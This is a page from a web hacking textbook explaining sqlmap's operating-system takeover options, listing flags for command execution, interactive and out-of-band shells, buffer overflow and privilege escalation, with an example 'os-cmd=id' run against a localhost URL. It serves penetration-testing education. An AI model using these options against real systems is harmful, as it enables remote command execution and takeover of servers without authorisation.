Web Hacking
◾
369
Operating System Takeover with Sqlmap
There are various commands in sqlmap that would allow you to execute
system commands upon
the underlying operating system. From the sqlmap help menu under the operating system section,
we can find the following commands:
-- os-cmd=OSCMD
Execute an operating system command
-- os-shell
Prompt for an interactive
operating system shell
-- os-pwn
Prompt for an out-of-band shell, meterpreter,
or VNC
-- os-smbrelay
One-click prompt for an OOB shell, meterpreter, or VNC
-- os-bof
Stored procedure buffer overflow exploitation
-- priv-esc
Database process
user privilege escalation
-- msf-path=
Path where Metasploit Framework 3 is installed
-- tmp-path=
Remote absolute path of temporary files directory
We will discuss about the first three commands next.
OS-CMD
The
os-cmd
can be used to execute commands on the target operating system by using the
LOAD_File function that we discussed earlier. Let’s
try executing the ID command; we will issue
the following command from the sqlmap:
./sqlmap.py –u http://localhost/?support=yes --os-cmd=id
id
command in Linux would display information about the particular user such as username,
user id, and group id.
Here is the output of the successful execution of the command:
OS-SHELL
The
next option is the
os-shell
, which gives an interactive shell so we can easily execute
commands.
